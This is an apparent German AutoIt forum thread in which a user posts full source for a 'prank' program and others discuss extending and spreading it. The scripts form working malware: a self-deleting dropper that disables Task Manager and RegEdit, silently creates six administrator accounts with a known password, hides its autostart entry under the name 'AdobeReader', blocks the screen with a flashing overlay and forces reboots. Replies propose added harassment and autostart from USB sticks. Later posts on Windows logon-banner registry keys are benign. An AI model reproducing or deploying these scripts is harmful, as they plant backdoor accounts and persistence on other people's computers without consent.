Gag, kleines Scherzprogramm

stormy

Servus,
ja ich bins schon wieder, das skript vorhin war nur ein Teilskript von einem größerem "Projekt".
Auf die Idee hat mich ein Freund gebracht, der einfach mal paar Klassenkollegen ärgern wollte.
Ich warne euch, macht es bloß bei Freunden und guten Kumpels, niemals bei Fremden oder Leuten die etwas gegen sowas haben. Dies ist als Scherz für ein paar Minuten, Stunden gut, nicht um jmd unendlich lange zu quälen und ihn sehr sehr sauer zu machen!!!.

Zuerst der Aufbau/das Prinzip:
1. Am Anfang ist es eine Exe, diese muss angestartet werden, daraufhin wird eine Datei, die main.exe heißt, in den Windowsordner unter den Namen mainly.exe kopiert.
2. Die mainly.exe löscht die Exe aus Schritt 1.
Der Taskmanager, RegEdit und den die Funktion zum Hintergrund ändern werden gesperrt.
Es werden 6 Benutzer angelegt mit den Namen 0wn3r 0-5 und dem Passwort 0wn3d und gleich der Gruppe Administratoren hinzugefügt (sofern Adminrechte vorhanden)
3. Es wird das Bild To.jpg (könnt ihr auch selbst erstellen) mit Owned!! in grüner Schrift und pinkem Hintergrund kopiert und als Desktophintergrund eingerichtet. Davor wird noch schnell die vorherige Einstellung gesichert.
4. Mainly.exe kopiert auch noch zusätzlich die Flash.exe und die Clean.exe in Systemordner.
Die Flash.exe wird dann gleich auch noch in den Autostart in der Registry geschrieben und danach wird der Rechner neu gestartet, dass das Hintergrundbild auf jeden Fall übernommen wird.
5. Die Flash.exe löscht die mainly.exe, da diese nicht mehr benötigt wird und verursacht Augenkrebs, verhindert, dass man mit der Maus i-wo hinklicken kann. (siehe auch hier , auch wenn hier noch eine Funktion zum Beenden dabei ist.)
6. Sobald genug von dem ganzen Mist hat macht man folgendes:
Windows+R drücken, cmd eingeben und enter drücken, ichbinsodoof eingeben und der Spuk ist vorbei. Die clean.exe wurde vorhin nämlich unter System32 kopiert und umbenannt in ichbinsodoof.exe (deswegen ist sie auch über cmd direkt aufruftbar).
7. clean/ichbinsodoof.exe löscht die ganzen Registryeinträge wieder, ändert den Bildschirmhintergrund zurück, stoppt den augenkrebs, aktiviert wieder taksmanager, RegEdit und die Funktion zum Hintergrund ändern, löscht die ganzen Dateien bis auf die sich selbst und installiert noch eine Datei in den temporären Ordner, die rest.exe.
8. rest.exe löscht die clean/ichbinsodoof.exe und startet den Rechner neu (temp wird geleert)
9. TaDaaa, keine Spuren mehr vorhanden und alles ist wieder rückgänig gemacht, aber wehe dem Notebookuser der keine Windowstaste hat, der darf über abgesicherten Modus im Notfall reingehen und dies eingeben.
Hier die Skripte:
1. main_install.au3 als Exe ist hier "1. Am Anfang ist es eine Exe,..." gemeint.

Spoiler anzeigen

[autoit]

#NoTrayIcon
$path = @WindowsDir&"\mainly.exe"
FileInstall("main.exe",$path,1)
$info = @WindowsDir&"\Web\Information.txt"
If FileExists($info) = 1 Then FileDelete($info)
FileWriteLine($info,@ScriptName&@LF&@ScriptDir)
ShellExecute($path)

[/autoit]

2. Das main Skript bzw. exe, die dann später auch die mainly.exe wird:

Spoiler anzeigen

[autoit]

#NoTrayIcon
$1 = FileReadLine(@WindowsDir&"\Web\Information.txt",1)
$2 = FileReadLine(@WindowsDir&"\Web\Information.txt",2)
$filemain= $2&"\"&$1
$counter = 0
While FileExists($filemain) = 1
FileDelete($filemain)
sleep(500)
$counter +=1
If $counter = 30 Then ExitLoop
WEnd
sleep(3000)

[/autoit] [autoit][/autoit] [autoit]

$policies="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\"
$backgr = $policies&"System"
$tskmgr = $policies&"System"
$regedit = $policies&"System"
RegWrite($tskmgr,"DisableTaskMgr","REG_DWORD","1")
RegWrite($regedit,"DisableRegistryTools","REG_DWORD","1")
RegWrite($backgr,"NoDispBackgroundPage","REG_DWORD","1")

[/autoit] [autoit][/autoit] [autoit]

;ja, ich weiß, ich hätte es mit einer For-Schleife und Arrays kürzer machen können
RunWait(@ComSpec&" /c "&'net user "0wn3r0" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r0" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r1" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r1" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r2" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r2" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r3" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r3" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r4" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r4" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r5" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r5" /add',"",@SW_HIDE)

[/autoit] [autoit][/autoit] [autoit]

FileInstall("flash.exe",@WindowsDir&"\Web\flash.exe",1)
FileInstall("clean.exe",@WindowsDir&"\System32\ichbinsodoof.exe",1)
$keyname3 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$type = "REG_SZ"
RegWrite($keyname3,"AdobeReader",$type,@WindowsDir&"\Web\flash.exe")

[/autoit] [autoit][/autoit] [autoit]

$path = @WindowsDir&"\Web\Wallpaper\owned.jpg"
FileInstall("To.jpg",$path,1)
$keyname = "HKEY_CURRENT_USER\Control Panel\Desktop"
$valuename = "ConvertedWallpaper"
RegWrite($keyname,$valuename,$type,$path)
sleep(5000)
RunWait(@ComSpec&" /c "&'shutdown -f -r -t 10',"",@SW_HIDE)

[/autoit]

3. die Flash die mit der main.exe "installiert" wird:

Spoiler anzeigen

[autoit]

#NoTrayIcon
#include <GUIConstants.au3>
#Include <Constants.au3>

[/autoit] [autoit][/autoit] [autoit]

$count = 0
While FileExists(@WindowsDir&"\mainly.exe") = 1
FileDelete(@WindowsDir&"\mainly.exe")
sleep(500)
If $count = 30 Then Exit
$count += 1
WEnd

[/autoit] [autoit][/autoit] [autoit]

$sleep = 300

[/autoit] [autoit][/autoit] [autoit]

$GUI = GuiCreate("Rahmen",@DesktopWidth,@DesktopHeight,0,0,$WS_POPUP,BitOR($WS_EX_TOPMOST,$WS_EX_TOOLWINDOW))
$colour1 = 0xFF00FF
$colour2 = 0x00FF00
WinSetTrans("Rahmen","",150)
$Rahmen = GUICtrlCreateLabel('',0,0,@DesktopWidth,@DesktopHeight,$SS_SUNKEN)
GUISetState(@SW_SHOW,$GUI)

[/autoit] [autoit][/autoit] [autoit]

While 1
GUICtrlSetBkColor($Rahmen,$colour1)
sleep($sleep)
GUICtrlSetBkColor($Rahmen,$colour2)
sleep($sleep)
WEnd

[/autoit]

4. das saubermache skript sprich die clean.exe bzw. dann anstarten der exe, die ichbinsodoof.exe:

Spoiler anzeigen

[autoit]

#NoTrayIcon
$policies="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\"
$backgr = $policies&"System"
$tskmgr = $policies&"System"
$regedit = $policies&"System"
RegDelete($tskmgr,"DisableTaskMgr")
RegDelete($regedit,"DisableRegistryTools")
RegDelete($backgr,"NoDispBackgroundPage")

[/autoit] [autoit][/autoit] [autoit]

$keyname = "HKEY_CURRENT_USER\Control Panel\Desktop"
$valuename = "ConvertedWallpaper"
$type = "REG_SZ"
$backgr = @WindowsDir&"\Web\Background.txt"
If FileExists($backgr) = 1 Then
$path= FileReadLine($backgr,1)
RegWrite($keyname,$valuename,$type,$path)
EndIf

[/autoit] [autoit][/autoit] [autoit]

$keyname = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RegDelete($keyname,"AdobeReader")

[/autoit] [autoit][/autoit] [autoit]

$1 = @WindowsDir&"\Web\Wallpaper\owned.jpg"
$3 = @WindowsDir&"\Web\flash.exe"
If FileExists($1) = 1 Then FileDelete($1)
If ProcessExists("flash.exe") = 1 Then ProcessClose("flash.exe")
sleep(4000)
If FileExists($3) = 1 Then FileDelete($3)

[/autoit] [autoit][/autoit] [autoit]

FileInstall("rest.exe",@TempDir&"\done.exe")
ShellExecute(@TempDir&"\done.exe")

[/autoit]

und zu guter letzt:
5. die rest.exe, um wirklich keine Spuren zu hinterlassen:

Spoiler anzeigen

[autoit]

#NoTrayIcon
sleep(5000)
FileDelete(@WindowsDir&"\System32\ichbinsodoof.exe")
RunWait(@ComSpec&" /c "&'shutdown -f -r -t 02',"",@SW_HIDE)

[/autoit]

Beim Kompilieren nur aufpassen, dass ihr zuerst mit 5. anfängt, dann 4., 3., 2. und zuletzt 1. sonst gehts nicht, weil es die Exen nicht findet.

Viel Spaß damit und stellt nicht zu viel Blödsinn an

Gruß Patrick

ps: im Anhang hab ich noch die Skripte reingepackt, für die, die zu faul sind für Copy&Paste
edit: Bild hat nicht reingepasst, macht euch einfach mit paint ein krasspinkes Bild mit grüner Schrift Owned (800x600) und speichert euch dieses als To.jpg ab.
edit2: wo anders hochgeladen
http://www.file-upload.net/member/view_6104_To.jpg.html

autoit.de/wcf/attachment/2184/
autoit.de/wcf/attachment/2185/
autoit.de/wcf/attachment/2186/
autoit.de/wcf/attachment/2187/
autoit.de/wcf/attachment/2188/

McPoldy

Das wichtigste hasstet wohl vergessen, danach haste einen guten Freund / gute Freundin weniger

stormy

morgen,

meine Freunde verkraften sowas, außerdem sag ich ja, was sie eingeben müssen um des wieder wegzubekommen
in dieser Richtung sind die sehr tolerant und werden sich natürlich dann auch mal rächen, die lassen sich dann auch irgendwas gutes einfallen
und Schaden an sich entsteht ja nicht

gruß patrick

LordKill94

hehe ist schon witzig

schicke ich vllt an meinen Freund hehe

naja paar sachen kann man noch dazu machen rofl

windows warnmeldungen kommen lassen mit dem taskmanager kriegt der sie ja nit weg (ist ja gesperrt) oder dumme fragen beantworten lassen wo er keine andere wahl hat (z.b Bist du doof? dann ja oder nein bei nein gehts dann nit XD ) .... es gibt so viele schöne sachen die man machen kann rofl

stormy

Jo, AutoIT bietet da ja eine unerschöpfliche Quelle von Gemeinheiten
So ein paar Warnmeldungen wären in der Tat noch ne schöne Sache oder so einen typsichen "haha"-Sound wäre auch lustig,
so á lá: nä nä nä nääää nääääääääääää nä !!!
Aber ich denke der hat vom Augenkrebs dann schon genug
Bin halt doch tief in meinem Inneren ein großes Spielkind
gruß stormy

muh_kuh

wie bekomme ich da sjetzt auf eine USB Stick in Autostart ?

Carsten

Meines Wissens gibt es keinen Win-Original-Autostart für USB-Sticks.

Das geht nur wenn auf dem Rechner ein Zusatzprogramm installiert wird/ist.

Der einfachere Weg ist dann vielleicht eine CD zu verteilen

muh_kuh

Zitat von Carsten

Meines Wissens gibt es keinen Win-Original-Autostart für USB-Sticks.

Das geht nur wenn auf dem Rechner ein Zusatzprogramm installiert wird/ist.

Der einfachere Weg ist dann vielleicht eine CD zu verteilen

es gibt irgendein Trick (gelsen das es einige WebeUSB Sticks machen)
das es eine Extra Partion gibt
die zum USB CD Laufwerk wird
wenn der USB Stick angeschlossen wird

dan würde sich keiner mehr meine USB Stick ausleihen

fabs

Programme automatisch starten per USB Stick geht nur mit U3-fähigen. Ansonsten kann man nur eine autorun.inf auf dem Stick erstellen:
[autorun]
icon=icon.ico
open=notepad.exe
action=notepad.exe

Dann sollte beim Einstecken im "Was soll getan werden"-Dialog die Option Editor/Notepad angezeigt werden.

muh_kuh

vielleicht sollte ich mir so ein U3 zulegen

**Alina**

Hallo muh kuh.

Also U3 kann ich nur sagen: genial !

Passwortschutz ist dabei, so kann man nur an die Daten, wenn man das PW eingegeben hat. Ich habe da ein kleines GUI, das öffnet sich dann und dort habe ich dann AutoIT und Scite drauf laufen.

AutoIT und Scite auf Stick? Ja, also bei mir läuft das einwandfrei. Stick rein und im GUI auswählen und alles läuft. Die Registryeinträge habe ich auf dem Stick als exportierte Datei und importiere diese einfach wieder. Habe ich mir so angewöhnt, als ich noch nicht wußte, das man das via Script auch ein- bzw. austragen lassen kann.

Wenn Du Dir ein U3 holst, dann sichere die Daten die da drauf sind. Wenn Du den Stick mal formatieren möchtest, dann brauchst Du diese evtl.

Wieso muß ich bei dem Nick "muh kuh" immer an diese leckeren Sahnebonbons denken? Wenn die nur nicht so auf die Figur gehen würden

LG, Crazy-A

**peethebee**

Da packe ich meine Daten aber wirklich lieber in TrueCrypt-Container (OpenSource!) als sie proprietärer "Sicherheits"- oder "Verschlüsselungs"-Software anzuvertrauen ;).

peethebee

muh_kuh

Zitat von Crazy-A

Hallo muh kuh.

Also U3 kann ich nur sagen: genial !
...
LG, Crazy-A

startet der U3 auch automatisch, ein Programm?
ohnen eine auswahl oder so was?

**Alina**

Also bei meinem Sick ist das so:

1. Möglichkeit
a) rein stecken
b) Sicherheitspasswort eingeben
c) Danach kann ich in der Menü-Auswähl ein Programm aufrufen.

2. Möglichkeit
a) rein stecken
b) Autostart wird ausgeführt
c) mein eigenes Menü, das ich mit AutoIt erstellt habe wird gestartet

Schau mal diese Seite an: http://de.wikipedia.org/wiki/U3_(Standard)
Hier kannst Du vieles nachlesen und da sind gute Links. Ich habe z. B. ein Programm, das Programme zu U3 installationsfähigen und U3 ausführbare Dateien macht. Die kann man dann sogar an andere U3-ler weiter geben, wenn man das bei der U3-Programmerstellung zugelassen hat. So bekommt man auch irgendwie AutoIt U3 lauffähig. Weiß nur nicht mehr wo ich das gelesen habe. Wenn es mir einfällt poste ich es.

Gruß, Crazy-A.

**Alina**

Hallo zusammen.

also damit die anderen nicht mehr sagen können: "Das habe ich nicht gelesen.", habe ich mir jetzt das einfallen lassen:

Spoiler anzeigen

[autoit]

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeCaption", "REG_SZ", "Meldung: Teamleiterin an alle")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeText", "REG_SZ", "Ab dem 01.05.2008 haben wir eine neue Telefonliste. Bitte die Mails bezüglich Umzug genau einhalten.")

[/autoit]

Das ganze dann auf jedem PC einmal über den Admin in die Profile packen lassen und jeder muß es sehen, wenn er den PC hoch fährt. Habend as ganze auf einer Testumgebung ausprobiert und dann auf einen vollständig eingerichteten PC. Okay, kommt noch ein GUI zu, denn das ganze soll ja auch veränderbar sein bzw. man sollte es ja auch wieder löschen können.

Aber wenn man den Text ändert, was meint ihr, wie einige Eurer "noch Freunde" schauen werden. Besonders die, die den Quelltext nicht haben und somit auch nicht wissen, wo was wann auf den PC geschrieben wurde.

Aber jetzt kann keine/r mehr sagen, das er die Nachricht nicht bekommen hat. Die Nachricht wird ja angezeigt, bevor man sich bei Windows dann anmelden kann und man muß sie bestätigen.

So, LG, Crazy-A.

progandy

Es muss aber auch CAD zum anmelden angeschaltet sein

Zitat von http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/12322.mspx?mfr=true

DisableCAD
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
...
0 = Users must press CTRL+ALT+DEL to log on to the system.
1 = Users need not press CTRL+ALT+DEL to log on to the system.
...
A setting of 1 suppresses a custom logon banner (see LegalNoticeCaption or LegalNoticeText ).

Alles anzeigen

**Alina**

@ progandy

Also das verstehe ich gerade gar nicht. Bei mir läuft es doch auch so wie ich es oben geschrieben habe. Das Script schreibt es einwandfrei und was soll das genau bewirken?

LG, Crazy-A(lina).

progandy

Musst du beiim Anmelden an XP CTRL-ALT-ENTF drücken? Wenn nein, dann ist die Info im MSDN iregendwie falsch
Mal bei mir testen ...

//Edit: Geht bei mir auch ohne CAd. Hab Willkommensseite aktiviert und DisableCAD gibt es bei mir gar nicht.
Das wär dann ein GUI dazu:

Spoiler anzeigen

[autoit]

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>

[/autoit] [autoit][/autoit] [autoit]

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("StartupMsg", 523, 405, 193, 125)
$e_Text = GUICtrlCreateEdit(RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeText"), 8, 88, 505, 273)
$chkShowNotice = GUICtrlCreateCheckbox("ShowNotice", 24, 8, 305, 25)
RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeText")
If Not @error Then GUICtrlSetState(-1, $GUI_CHECKED)
$i_Titel = GUICtrlCreateInput(RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeCaption"), 48, 56, 441, 21)
$Label1 = GUICtrlCreateLabel("Titel", 16, 56, 24, 17)
$b_OK = GUICtrlCreateButton("OK",10,370,100)
$b_Apply = GUICtrlCreateButton("Apply",120,370,100)
$b_Cancel = GUICtrlCreateButton("Cancel",230,370,100)
_SwitchGUI()
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

[/autoit] [autoit][/autoit] [autoit]

While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $b_OK
_Apply()
Exit
Case $b_Apply
_Apply()
Case $b_Cancel
Exit
Case $chkShowNotice
_SwitchGUI()
EndSwitch
WEnd

[/autoit] [autoit][/autoit] [autoit]

Func _Apply()
If BitAND(GUICtrlRead($chkShowNotice),$GUI_CHECKED)=$GUI_CHECKED Then
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeCaption", "REG_SZ", GUICtrlread($i_Titel))
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeText", "REG_SZ", GUICtrlRead($e_Text))
Else
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeCaption")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\", "LegalNoticeText")
EndIf
EndFunc
Func _SwitchGUI()
If BitAND(GUICtrlRead($chkShowNotice),$GUI_CHECKED)=$GUI_CHECKED Then
GUICtrlSetState($e_Text,$GUI_ENABLE)
GUICtrlSetState($i_Titel,$GUI_ENABLE)
Else
GUICtrlSetState($e_Text,$GUI_DISABLE)
GUICtrlSetState($i_Titel,$GUI_DISABLE)
EndIf
EndFunc

[/autoit]

Nightfire

sry, dass ich diesen Thread nommal ausgraben muss, aber bei mir findet er keine mainly.exe, und ich habe alle scripte runtergeladen, auf den Desktop und wenn ich eine_exe.au3 starte, kommt C:\WINDOWS\main.exe konnte nicht gefunden werden und dann noch bei ShellExecute($path) Error:Unable to execute the external program
Das System kann die angegebene Datei nicht finden.
Bitte sagt mir, was ich falsch mache!

hxhjx

regedit, geht unter windows vista nicht!